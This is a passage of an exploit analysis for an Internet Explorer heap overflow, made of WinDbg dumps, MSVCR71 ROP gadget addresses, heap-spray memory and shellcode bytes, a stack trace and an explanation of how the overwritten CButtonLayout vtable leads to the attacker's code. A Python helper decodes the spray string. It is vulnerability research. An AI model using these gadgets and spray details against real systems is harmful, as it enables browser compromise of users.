MSVCR71!wparse_cmdline+0x40 [f:\vs70builds\3052\vc\crtbld\crt\src\stdargv.c @ 244]:

7c348b05 94 xchg eax,esp

7c348b06 c3 ret

 

0x07070024 holds the ROP chain, i.e. the data the attacker placed there with the heap spray.
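The link between the `unescape()` string in the script and the `dc 0x07070024` dump above can be checked offline. Here is an added Python example (not from the original post) that decodes a JavaScript %u-encoded string into the little-endian dwords it occupies in memory, parses `dc` output, and confirms that the words at 0x07070024 are the start of the sprayed string; the MSVCR71 address range used to count gadget-like pointers is an assumption based on the 7c34xxxx addresses in the dump, not a value from the page.

```python
import re

# Constructed sample: the first two lines of the `dc 0x07070024` dump shown
# above, used as the offline reference for the check below.
DC_DUMP = """\
07070024 7c346c0b 7c36f970 7c348b05 7c36f970 .l4|p.6|..4|p.6|
07070034 7c36f970 7c34373a 00000400 7c3444d0 p.6|:74|.....D4|
"""

# The first eight %u units of the exploit's unescape() string, as on the page.
SPRAY_PREFIX = "%u6c0b%u7c34%uf970%u7c36%u8b05%u7c34%uf970%u7c36"

# ASSUMED address range for the non-ASLR MSVCR71.dll image, chosen from the
# 7c34xxxx-7c38xxxx gadget addresses in the dump; not a value from the page.
MSVCR71_RANGE = (0x7C340000, 0x7C396000)

HEXDIGITS = set("0123456789abcdefABCDEF")


def _hex(s, i, n):
    """Return int(s[i:i+n], 16) if those n characters are all hex, else None."""
    chunk = s[i:i + n]
    return int(chunk, 16) if len(chunk) == n and set(chunk) <= HEXDIGITS else None


def js_unescape_bytes(s):
    """Decode a JavaScript unescape() string to the bytes it occupies in memory.

    %uXXXX yields one UTF-16 code unit, %XX yields the unit 0x00XX, and any
    other character (including a malformed %) is kept as its own code unit.
    Each unit is stored little-endian, so "%u6c0b%u7c34" becomes 0x7c346c0b.
    """
    out = bytearray()
    i = 0
    while i < len(s):
        unit, step = None, 1
        if s.startswith("%u", i):
            unit, step = _hex(s, i + 2, 4), 6
        if unit is None and s.startswith("%", i):
            unit, step = _hex(s, i + 1, 2), 3
        if unit is None:
            unit, step = ord(s[i]), 1
        out += unit.to_bytes(2, "little")
        i += step
    return bytes(out)


def dwords_le(data):
    """Split bytes into little-endian 32-bit words (trailing partial word dropped)."""
    return [int.from_bytes(data[i:i + 4], "little") for i in range(0, len(data) - 3, 4)]


# address followed by one to four dwords; the ASCII column is ignored
DC_LINE = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{8}){1,4})", re.IGNORECASE)


def parse_dc(text):
    """Map address -> dword for every word in WinDbg `dc` output."""
    mem = {}
    for line in text.splitlines():
        m = DC_LINE.match(line.strip())
        if not m:
            continue
        base = int(m.group(1), 16)
        for k, word in enumerate(m.group(2).split()):
            mem[base + 4 * k] = int(word, 16)
    return mem


def spray_matches_dump(spray, dump, addr):
    """True if the decoded spray string's dwords appear at addr in the dump."""
    mem = parse_dc(dump)
    words = dwords_le(js_unescape_bytes(spray))
    return all(mem.get(addr + 4 * k) == w for k, w in enumerate(words))


def count_module_pointers(words, lo, hi):
    """Number of dwords inside [lo, hi); a high ratio in a sprayed string is a
    sign of an embedded ROP chain rather than plain data."""
    return sum(1 for w in words if lo <= w < hi)


if __name__ == "__main__":
    words = dwords_le(js_unescape_bytes(SPRAY_PREFIX))
    print(["%08x" % w for w in words])
    print("matches dump:", spray_matches_dump(SPRAY_PREFIX, DC_DUMP, 0x07070024))
    print("MSVCR71 pointers:", count_module_pointers(words, *MSVCR71_RANGE), "of", len(words))
```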

 

2.3 EIP control

Set a hardware read/write breakpoint at 0x05070bf8:

ba r4 0x05070bf8

This is the point at which execution enters the ROP chain.

 

0:005> dc ecx

05070bf8 07070024 0380b7d0 0506f7c0 68748690 $.............th

05070c08 70700248 07070024 07070024 07070024 H.pp$...$...$...

05070c18 00000000 00000000 00000000 70700248 ............H.pp

05070c28 07070024 07070024 07070024 00000000 $...$...$.......

05070c38 00000000 00000000 70700248 07070024 ........H.pp$...

05070c48 07070024 07070024 00000000 00000000 $...$...........

05070c58 00000000 70700248 07070024 07070024 ....H.pp$...$...

05070c68 07070024 00000000 00000000 00000000 $...............

0:005> dc eax+8

0707002c 7c348b05 7c36f970 7c36f970 7c34373a ..4|p.6|p.6|:74|

0707003c 00000400 7c3444d0 00000040 7c361829 .....D4|@...).6|

0707004c 7c38f036 7c342766 7c346c0b 7c350564 6.8|f'4|.l4|d.5|

0707005c 7c3415a2 7c3766ff 7c37a151 7c378c81 ..4|.f7|Q.7|..7|

0707006c 7c345c30 d18c67e0 4fe2c0fe b5b49b25 0\4|.g.....O%...

0707007c 347bb08d 7f961c76 054bf53b 72d669a9 ..{4v...;.K..i.r

0707008c 46a8b166 eb3870be bfd48835 b3ba4e49 f..F.p8.5...IN..

0707009c 9092432c f831932d 424a97bb 4791b841 ,C..-.1...JBA..G

0:005> kv

ChildEBP RetAddr Args to Child

0278d2d0 687e3cd4 0278d490 00000001 0278d490 mshtml!NotifyElement+0x3d (FPO: [0,0,1])

0278d300 687b25fc 0278d360 037bfd10 0278d490 mshtml!CMarkup::BuildDescendentsList+0x227

0278d3f8 687b257a 003eef50 0278d490 003ef014 mshtml!CMarkup::NotifyDescendents+0x78

0278d44c 687b20be 0380b7d0 00000000 00000000 mshtml!CMarkup::SendNotification+0x92

0278d474 686dd9e9 0278d490 037a9ba8 003f0188 mshtml!CMarkup::Notify+0xd6

0278d550 68600543 037a9ba8 00000001 003a6884 mshtml!CMarkup::SaveHistoryInternal+0x9c2

0278d578 686d5696 003f0188 037a92c0 0278d5d4 mshtml!CWindow::SaveHistory+0xa9

0278d588 6e34674f 003eef50 037a92c0 00000001 mshtml!CDoc::SaveHistory+0x1a

0278d5d4 6e346638 037a92c0 0278d5f8 6e3467be IEFRAME!CBaseBrowser2::_SaveHistory+0x10e (FPO: [Non-Fpo])

0278d5e0 6e3467be 003a679c 037a92c0 03769960 IEFRAME!CBaseBrowser2::SaveHistory+0x13 (FPO: [Non-Fpo])

0278d5f8 6e346779 003a679c 037a92c0 00000000 IEFRAME!CTravelEntry::_PersistHistoryToStream+0x38 (FPO: [Non-Fpo])

0278d620 6e349380 003a6734 00000000 003a679c IEFRAME!CTravelEntry::Update+0xde (FPO: [Non-Fpo])

0278d644 6e39b178 0034436c 003a6734 00000000 IEFRAME!CTravelLog::UpdateEntryEx2+0x3f (FPO: [Non-Fpo])

0278d688 6e426851 0034436c 00000000 00000000 IEFRAME!CBaseBrowser2::_UpdateTravelLogEx+0x18e (FPO: [Non-Fpo])

0278d6b0 6e39a236 00000000 00000043 00000000 IEFRAME!CBaseBrowser2::_ExecStandardGroup+0x190 (FPO: [Non-Fpo])

0278d6cc 6e3dd665 003a6744 00000000 00000043 IEFRAME!CBaseBrowser2::Exec+0x24 (FPO: [Non-Fpo])

0278d6fc 6e3dd56a 00000000 00000043 00000000 IEFRAME!CShellBrowser2::_Exec_CCommonBrowser+0x81 (FPO: [Non-Fpo])

0278d994 6e3bc655 003a6744 00000000 00000043 IEFRAME!CShellBrowser2::Exec+0x747 (FPO: [Non-Fpo])

0278d9c4 687af9d8 003d650c 00000000 00000043 IEFRAME!CDocObjectHost::Exec+0x186 (FPO: [Non-Fpo])

0278d9ec 68911972 00000000 00000043 00000000 mshtml!CTExec+0x3e

0278da04 68945d97 003e5498 0000031a 00000113 mshtml!CDoc::UpdateCurrentEntryAndAddNoNewEntry+0x14 (FPO: [0,0,0])

0278da18 6878e672 003c3a20 00001009 0278da4c mshtml!CDataRecovery::SaveDataCallback+0x3e

0278da28 687a68c7 00002034 0278dac8 00000113 mshtml!CStackDataAry<TIMERTHREADADVISE,12>::GetStackSize+0xb6

0278da4c 7578c4e7 001b0272 00000425 00002034 mshtml!GlobalWndProc+0x183

0278da78 7578c5e7 687a6853 001b0272 00000113 USER32!InternalCallWinProc+0x23

0278daf0 7578cc19 00000000 687a6853 001b0272 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])

0278db50 7578cc70 687a6853 00000000 0278fc70 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])

0278db60 6e3b4bec 0278db88 00000000 00a11e10 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])

0278fc70 6e3c4f62 0037d2a8 00000000 00330e38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x54b (FPO: [Non-Fpo])

0278fd28 75a35c2b 00a11e10 00000000 0278fd44 IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])

0278fd38 76f43c45 00330e38 0278fd84 772437f5 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])

0278fd44 772437f5 00330e38 753cecde 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])

0278fd84 772437c8 75a35c1d 00330e38 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])

0278fd9c 00000000 75a35c1d 00330e38 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])

After the call, execution enters the ROP chain.

 

3. Summary

The memory layout at the overflow site is:

overflowed block (0xfc) | 'A' string (0x100) | 'B' string (0x100) | CButtonLayout (0xfc)

Because heap blocks are allocated in 8-byte units, a 0xfc block actually occupies 0x100 bytes.

When the heap overflow occurs it overwrites the CButtonLayout's vtable pointer; after garbage collection, a virtual function of the CButtonLayout is called, and execution ends up in the attacker's shellcode.

 

 
